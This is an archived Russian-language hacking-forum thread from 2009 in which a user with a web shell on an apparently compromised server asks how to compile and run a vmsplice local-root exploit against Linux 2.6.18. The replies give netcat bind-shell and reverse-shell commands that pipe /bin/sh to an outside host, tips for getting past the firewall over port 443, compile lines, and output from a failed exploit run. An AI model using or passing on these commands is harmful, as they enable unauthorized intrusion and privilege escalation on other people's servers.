Просмотр полной версии : Linux Kernel 2.6.18 vS Exploit
mailbrush
18.05.2009, 22:17
Есть у меня веб-шелл на серваке Linux Kernel 2.6.18 и сплоит под него - http://www.milw0rm.com/exploits/5092. Со сплоитами никогда не работал, поэтому задаю такой вопрос - как его откомпилить, имея только веб-шелл (права на запись есс-но есть, но только в текущей директории)?
Shaitan-Devil
18.05.2009, 22:20
Попробуй
gcc -o sploit sploit.c; chmod +x sploit;./sploit
НУ или
gcc -o sploit sploit.c; chmod 777 sploit;./sploit
ну или без chmod
gcc -o sploit sploit.c;./sploit
А вообще в интернете много статей.
mailbrush
18.05.2009, 22:28
Я видел на хакере точно такой же, только там $ был спереди, поэтому ничего не работало. Сейчас попробую.
тебе как минимум надо получить нормальный шелл
mailbrush
18.05.2009, 22:35
У меня Веб-Шелл, а не SSH доступ, и gcc почему-то там не пашет. Я юзаю в eval()
system('gcc -o exploit exploit.c;');
PS: в линухе я полный 0
Shaitan-Devil
18.05.2009, 22:36
Нужно сделать бекконнект или забиндить порт.
П.С. Или нет?=\
PS: в линухе я полный 0
это чувствуется)
$ перед командой - это пояснение, что команды выполняются с правами обычного пользователя. # - с правами рута.
У меня Веб-Шелл, а не SSH доступ
забинди порт или сделай бек-конект.
gcc почему-то там не пашет
что выведет which gcc?
which gcc cc cpp
бинди порт, например неткатом
nc -l -p 31337 -e /bin/sh &
потом у себя неткатом
nc -v www.site.com 31337
Если тебе очень повезло и фаер не блочит соединения тебя поприветствует оболчка шелла
В ином случае делай бекконект
у себя на дедике открываешь порт
nc -l -p 31337
на сервер который собираешься рутать
nc -v www.dedik.com 31337 -e /bin/sh &
Удачи =)
AkyHa_MaTaTa
18.05.2009, 23:12
Нет факт что:
-- на хосте присутсвует gcc(мало вероятно);
-- что у твоего блайнда хватит прав на доступ к gcc(более вероятно, как правило nobody и etc);
Скомпиль на локальной машине, скопирую(выстави права по необходимости) и запускай(не фактов тоже много).
AkyHa_MaTaTa, уж если ему не хватит прав на gcc, то ещё более вероятно что там noexec ;)
mailbrush
18.05.2009, 23:33
Эх вы, "линуксоиды", мне до вас еще далеко... Надо читать, читать и еще раз читать, а лутше - самому линуху установить... Смотрите ПМ :)
Pashkela
19.05.2009, 00:57
Сначала пусть нормальный шелл или срипт бекконекта найдет, без всего этого шансов точно ноль
бекконект на порт 443, который предварительно освобождается на дедике(остановка службы https\SSL), проходит в 90% случаев..а дальше тебе уже понаписали.
зы: если ядро до 2008г, то шансы на рут есть,в противном случае - уменьшаются в геометрической прогрессии...
mailbrush
19.05.2009, 21:10
Мне уже юзер oRb объяснил, что сплоит не подходит под этот двиг, хотя в uname -a именно эта версия. Спасибо всем за ответы.
нужена оболочка с поддежкой псевдо терминала.
ph1l1ster
22.05.2009, 14:42
Мне уже юзер oRb объяснил, что сплоит не подходит под этот двиг, хотя в uname -a именно эта версия. Спасибо всем за ответы.
ещё как подходит!
https://forum.antichat.ru/showthread.php?t=30711
http://forum.xakep.ru/m_1073063/tm.htm
ядро 2.6.18 должно сдаться vmsplice-exploit. А компилится оно так
$ gcc -static -Wno-format -o vmsplice vmsplice.c
mailbrush дал мне свой шелл.
gcc там нет, поэтому сплойт собрал на другой тачке. Скачал, сменил чмод и запустил:
sh-3.2$ ./sp
-----------------------------------
Linux vmsplice Local Root Exploit
By qaaz
-----------------------------------
[-] mmap: Permission denied
sh-3.2$ uname -a
Linux ************** 2.6.18-92.1.22.el5PAE #1 SMP Tue Dec 16 12:36:25 EST 2008 i686 i686 i386 GNU/Linux
видимо ядро патченное.
sh-3.2$ ./sp
-----------------------------------
Linux vmsplice Local Root Exploit
By qaaz
-----------------------------------
[-] mmap: Permission denied
sh-3.2$ uname -a
Linux ************** 2.6.18-92.1.22.el5PAE #1 SMP Tue Dec 16 12:36:25 EST 2008 i686 i686 i386 GNU/Linux
видимо ядро патченное.
По практике могу сказать что сплоент пробивает версии выпущенные ранее 12-14 февраля 2008.
vBulletin® v3.8.14, Copyright ©2000-2026, vBulletin Solutions, Inc. Перевод: zCarot